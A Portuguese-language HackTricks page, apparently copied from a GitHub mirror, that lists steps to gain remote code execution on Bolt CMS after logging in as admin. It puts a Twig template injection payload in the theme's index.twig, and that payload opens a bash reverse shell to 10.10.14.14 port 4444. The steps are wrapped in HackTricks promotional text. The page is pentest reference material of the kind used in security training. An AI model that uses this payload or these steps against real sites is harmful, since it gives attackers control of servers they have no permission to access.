mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-01 00:49:40 +00:00
3.4 KiB
3.4 KiB
Bolt CMS
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo do telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do HackTricks e HackTricks Cloud.
RCE
Após fazer login como admin (acesse /bot para ver o prompt de login), você pode conseguir um RCE no Bolt CMS:
- Selecione
Configuration->View Configuration->Main Configurationou acesse o caminho da URL/bolt/file-edit/config?file=/bolt/config.yaml - Verifique o valor do tema
- Selecione
File management->View & edit templates - Selecione o tema base encontrado no passo anterior (
base-2021neste caso) e selecioneindex.twig - No meu caso, isso está no caminho da URL /bolt/file-edit/themes?file=/base-2021/index.twig
- Insira seu payload neste arquivo via injeção de template (Twig), como:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - E salve as alterações
- Limpe o cache em
Maintenance->Clear the cache - Acesse a página novamente como um usuário regular, e o payload deve ser executado
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo do telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do HackTricks e HackTricks Cloud.